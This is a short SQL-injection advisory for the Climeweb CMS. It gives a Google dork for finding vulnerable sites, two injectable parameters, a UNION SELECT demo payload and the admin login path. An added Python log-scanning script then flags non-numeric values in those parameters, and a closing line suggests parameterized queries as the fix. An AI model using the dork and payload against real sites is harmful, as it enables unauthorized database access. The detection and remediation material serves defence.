==========================================================================
# Exploit Title: Climeweb Blind SQL Injection Vulnerability
# Date: 11.10.2011
# Author: poach3r
# Software Link: http://www.climeweb.com/
# Tested on: Windows XP SP3
# Google Dork: "Powered by Climeweb" inurl:"indux.php"
==========================================================================
# Exploit :
http://127.0.0.1/path/indux.php?id=[SQL]
http://127.0.0.1/path/newsdetails.php?News_Id=[SQL]

# Demo :
http://127.0.0.1/path/indux.php?id=-2+union+select+1,version(),3,4,5+admin--

# Admin Page :
http://127.0.0.1/path/admin/login.php
==========================================================================
# GreetZ To : All IRANIAN HackerZ
./End
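
Added example (not part of the original advisory): a log check for the two parameters named above, flagging any request to indux.php or newsdetails.php whose id / News_Id value is not a plain integer after URL decoding. It assumes Apache/nginx common or combined log format and that legitimate values are numeric row ids; the function name and the sample log lines are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Parameters the advisory names as injectable, keyed by script name.
WATCHED = {"indux.php": "id", "newsdetails.php": "News_Id"}
# Assumption: legitimate values are plain decimal row ids.
NUMERIC = re.compile(r"\d{1,10}")
# Minimal matcher for common/combined log format: client, request target, status.
LOG_LINE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]*\] "(?:GET|POST|HEAD) (\S+) [^"]*" (\d{3})')

# Constructed sample lines (documentation IP ranges), not real traffic.
SAMPLE_LOG = """\
198.51.100.7 - - [11/Oct/2011:10:01:02 +0000] "GET /path/indux.php?id=12 HTTP/1.1" 200 5120
203.0.113.9 - - [11/Oct/2011:10:01:05 +0000] "GET /path/indux.php?id=-2+union+select+1,version(),3,4,5+admin-- HTTP/1.1" 200 4870
203.0.113.9 - - [11/Oct/2011:10:01:09 +0000] "GET /path/newsdetails.php?News_Id=3%27 HTTP/1.1" 500 310
198.51.100.7 - - [11/Oct/2011:10:02:00 +0000] "GET /path/newsdetails.php?News_Id=3 HTTP/1.1" 200 2290
198.51.100.8 - - [11/Oct/2011:10:02:30 +0000] "GET /path/about.php?id=abc HTTP/1.1" 200 900
"""

def suspicious_requests(log_text):
    """Return (client, script, param, decoded_value, status) for each hit."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_LINE.match(line)
        if not m:
            continue
        client, target, status = m.group(1), m.group(2), int(m.group(3))
        url = urlsplit(target)
        script = url.path.rsplit("/", 1)[-1].lower()
        param = WATCHED.get(script)
        if param is None:
            continue  # not one of the two scripts from the advisory
        # parse_qsl decodes %XX and '+', so encoded payloads are compared decoded.
        for name, value in parse_qsl(url.query, keep_blank_values=True):
            if name.lower() == param.lower() and not NUMERIC.fullmatch(value):
                hits.append((client, script, param, value, status))
    return hits

if __name__ == "__main__":
    for hit in suspicious_requests(SAMPLE_LOG):
        print(hit)
```

The same integer-only rule applied server-side (cast or reject before the value reaches the query, plus a parameterized statement) removes the injection point rather than only detecting it.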